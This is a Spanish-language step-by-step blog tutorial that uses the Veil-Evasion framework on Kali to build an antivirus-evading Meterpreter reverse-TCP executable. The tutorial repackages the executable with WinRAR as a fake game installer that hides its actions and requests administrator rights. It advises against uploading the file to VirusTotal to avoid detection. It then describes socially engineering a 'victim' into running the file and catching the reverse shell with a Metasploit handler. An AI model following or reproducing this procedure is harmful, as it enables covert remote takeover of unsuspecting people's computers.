Buen dia comunidad, un gusto compartir con ustedes este post en el que les hablaré de Veil-evasion,s un framework creado por Christopher Truncer para generar ejecutables que no sean detectados por los antivirus comunes, técnica normalmente conocida como bypass de antivirus, evadir antivirus o simplemente volver in-detectable un ejecutable.
A continuación veremos como paso a paso, utilizando este framework generamos un ejecutable que nuestro antivirus analizara y no lo tomara como una amenaza.

Lo primero que debemos hacer es abrir una terminal en nuestro kali.

Bypass-Antivirus

Con el comando apt-get update lo que en realidad vamos ha hacer es actualizar los repositorios, ver si hay algo nuevo, es decir actualizar la lista de todos los paquetes, con la dirección de dónde obtenerlos para que a la hora de hacer la búsqueda y su posterior descarga, sea más rápida.

Bypass-Antivirus

Luego apt-get upgrade,que lo que hace es una actualización de nuestro sistema con todas las posibles actualizaciones que pudiera haber, es decir no sólo actualiza nuestro sistema operativo sino que también las aplicaciones que están contenidas en los repositorios. Este paso puede ser algo demorado dependiendo de la cantidad de aplicaciones.

Bypass-Antivirus

Después de haber actualizado nuestro kali, continuamos con la instalación de nuestro framework Veil usando el comando apt-get install veil. Este paso también tarda un poco ya que se realiza una descarga de 195 Mb.

Bypass-Antivirus

Después de instalar Veil, naveguamos hasta el directorio de instalación con el comando cd /usr/share/veil-evasion/setup/ estando dentro del directorio con el comando ls listamos los ficheros dentro de la ruta, podremos visualizar un script con el nombre setup.sh y lo ejecutamos el comando ./setup.sh

Bypass-Antivirus

El script se ejecutara

Bypass-Antivirus

Nos pide que hagamos unas instalaciones de Phyton damos clic en Next >.

Bypass-Antivirus

Damos clic en Next >.

Bypass-Antivirus

Remplazamos los archivos existentes dando clic en Yes.

Bypass-Antivirus

Damos clic en Next >.

Bypass-Antivirus

Damos clic en Finish.

Bypass-Antivirus

Damos clic en Siguiente >.

Bypass-Antivirus

Damos clic en Siguiente >.

Bypass-Antivirus

Damos clic en Terminar.

Bypass-Antivirus

Damos clic en Siguiente >.

Bypass-Antivirus

Damos clic en Siguiente >.

Bypass-Antivirus

Damos clic en Siguiente >.

Bypass-Antivirus

Damos clic en Terminar.

Bypass-Antivirus

Finalmente tenemos el framework de Veil instalado y configurado en nuestro kali con el comando clear limpiamos nuestra consola.

Bypass-Antivirus

Nos devolvemos al directorio root con el comando cd /root y abrimos Veil con el comando veil-evasion

Bypass-Antivirus

Esta abierto nuestro Veil con diferentes opciones

Bypass-Antivirus

Con el comando list nos muestra los payloads que podemos usar

Bypass-Antivirus

En la versión 2.4.3 que he instalado me aparecen un total de 24 payloads.

Bypass-Antivirus

Ingresamos el número del payload a utilizar en este caso usare el número:

18) python/metertpreter/rev_tcp

Bypass-Antivirus

En otra terminal con el comando ifconfig averiguamos la ip de nuestro kali para que la víctima se conecte hacia nosotros con el archivo.exe que crearemos con Veil.

Bypass-Antivirus

Con el comando set LHOST 10.0.1.31 (la ip de nuestro kali o localhost) agregamos un parámetro que es obligatorio para poder crear nuestro archivo.exe

Bypass-Antivirus

Con el comando generate crearemos el archivo.exe

Bypass-Antivirus

Ingresa el nombre del archivo en mi caso le pondré “archivo”

Bypass-Antivirus

Ingresamos el número del tipo de .exe en mi caso pondré el

1)    Pyinstaller (default)

Bypass-Antivirus

Se ha creado nuestro archivo.exe y nos muestra todos los parámetros que le hemos pasado además la ruta donde se ha creado /root/veil-output/compiled/archivo.exe

Bypass-Antivirus

Presionamos CTRL+C para salir de Veil y ponemos la ruta donde se encuentra nuestro archivo con el comando cd /root/veil-output/compiled/ para revisar que si se haya creado exitosamente ingresamos el comando ls para listar los archivos de esta carpeta, como podemos ver se creó satisfactoriamente

Bypass-Antivirus

Daremos un toque más personalizado a nuestro archivo.exe poniéndole otro nombre y un icono más llamativo, para hacer esto llevamos nuestro archivo a un entorno Windows, usaremos winrar y un icono para pulir nuestro archivo.exe

Bypass-Antivirus

Señalamos los dos archivos damos contra clic y seleccionamos Añadir al archivo

Bypass-Antivirus

Le damos un nombre llamativo a nuestro archivo en mi caso es el nombre de un instalador para un juego de Xbox 360 “Install Gears Online.exe” y damos clic la opción crear archivo autoextraíble luego continuamos a la pestaña Avanzado

Bypass-Antivirus

Damos clic en Autoextraíble… en algunas visiones de winrar dice FX

Bypass-Antivirus

Damos la ruta de extracción de nuestros archivos y damos clic en Instalación

Bypass-Antivirus

Ponemos el nombre de nuestro archivo.exe con extensión, damos clic en Modos

Bypass-Antivirus

Damos clic en Ocultar todo y luego en Avanzado

Bypass-Antivirus

Damos clic en Solicitar acceso como Administrador y luego damos clic en Actualizar

Bypass-Antivirus

Damos clic en Omitir ficheros Existentes y luego en Texto e icono

Bypass-Antivirus

Examinamos la ruta del icono llamativo
Bypass-Antivirus y damos clic en Aceptar

Bypass-Antivirus

Clic en Aceptar
Bypass-Antivirus

Ya tenemos nuestro archivo.exe con un nuevo icono y un nuevo nombre

Bypass-Antivirus

La prueba de fuego escanearlo con un antivirus y recién actualizado

Bypass-Antivirus

Ha pasado la prueba el EsetNod32 actualizado, no detecto amenazas en nuestro archivo

Bypass-Antivirus

Les recomiendo no subir este tipo de archivos para probarlos en páginas como VIRUS TOTAL ya que estas se encargan de enviar estos datos para que sean examinados y reportar a las casa software de antivirus y podríamos perder la funcionalidad del framework.

Bypass-Antivirus

Con un poco de ingeniería social hacemos llegar este archivo a nuestra víctima ya sea por correo un amigo muy cercano o de la manera que se les pueda ocurrir, el éxito depende un poco, de cuanto sepamos de esta persona ya que si es alguien que no le gusten los videojuegos como lo es en mi caso dudo mucho que lo abra. Es decir una imagen y nombre acorde a los gustos de nuestra víctima. Volviendo a nuestro kali abrimos Metasploit-framework con el comando msfconsole esto tarda un poco

Bypass-Antivirus

Utilizamos el comando use exploit/multi/handler y tomamos los parametros del localhost, del localport y el payload que utilizaremos. Damos el comando exploit para que corra el exploit

Bypass-Antivirus

Asumiendo que la víctima abre el “instalador del juego” miramos en nuestro kali que esta sucediendo

Bypass-Antivirus

A nuestra victima si le gustan los videojuegos GAME OVER

Bypass-Antivirus

 

Para más información visita la pagina oficial del framework:
https://www.veil-framework.com/

Y sus excelentes guías y vídeos:
https://www.veil-framework.com/guidesvideos/

 Articulo escrito por Edgar Parra para La Comunidad DragonJAR

Congreso Hacker Colombia